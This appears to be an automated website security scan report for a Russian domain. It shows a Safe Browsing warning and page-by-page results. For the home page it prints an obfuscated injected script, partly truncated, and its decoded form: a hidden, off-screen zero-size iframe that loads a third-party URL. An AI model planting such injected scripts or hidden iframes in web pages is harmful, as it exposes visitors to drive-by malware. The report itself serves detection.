Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gupsppm.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gupsppm.ru/ | 200 OK Content-Length: 38309 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. PeTySqDOFV=0;try{gUYqdDmCIt=0;try{IZiXg=prototype;}catch(siematf){cBTrUSwe="e";NwYMshi=[41,86,83,95,78,90,82,13,96,95,80,42,15,85,97,97,93,39,28,28,82,81,86,97,27,95,78,86,91,80,92,89,89,82,80,97,86,92,91,97,78,91,88,96,27,80,92,90,28,44,61,53,61,64,64,50,64,54,49,42,91,87,95,58,59,95,98,49,58,85,99,55,51,54,61,52,56,98,69,49,64,56,67,79,58,29,36,61,65,85,91,55,88,92,31,78,85,82,35,55,67,84,105,59,103,58,32,58,87,50,33,60,49,81,87,71,87,66,33,70,87 ...[889 bytes skipped]... Decoded script: <iframe src="http://edit.raincollectiontanks.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|NzM3MjE4ODdjZjU4Yjk4YzFhYWJjMDg2MDViOWU1ZGY" width="0px" height="0px" style="position:absolute;left:-10000px;"></iframe> | ||
http://www.gupsppm.ru/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://www.gupsppm.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 302 Found Connection: close Date: Wed, 14 Jan 2015 22:23:33 GMT Location: http://err.agava.ru/vh/404.html Server: nginx Content-Type: text/html; charset=iso-8859-1 | clean |
http://err.agava.ru/vh/404.html | 200 OK Content-Length: 12338 Content-Type: text/html | clean |
http://err.agava.ru/vh/js/main.js | 200 OK Content-Length: 34164 Content-Type: application/x-javascript | clean |
http://www.gupsppm.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Wed, 14 Jan 2015 22:23:34 GMT Location: http://err.agava.ru/vh/404.html Server: nginx Content-Type: text/html; charset=iso-8859-1 | clean |
http://err.agava.ru/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 14 Jan 2015 22:40:40 GMT Location: http://err.agava.ru/vh/404.html Server: nginx/0.7.67 Content-Length: 161 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gupsppm.ru
Result:
GET / HTTP/1.1
Host: gupsppm.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gupsppm.ru
Referer: http://www.google.com/search?q=gupsppm.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gupsppm.ru
Referer: http://www.google.com/search?q=gupsppm.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.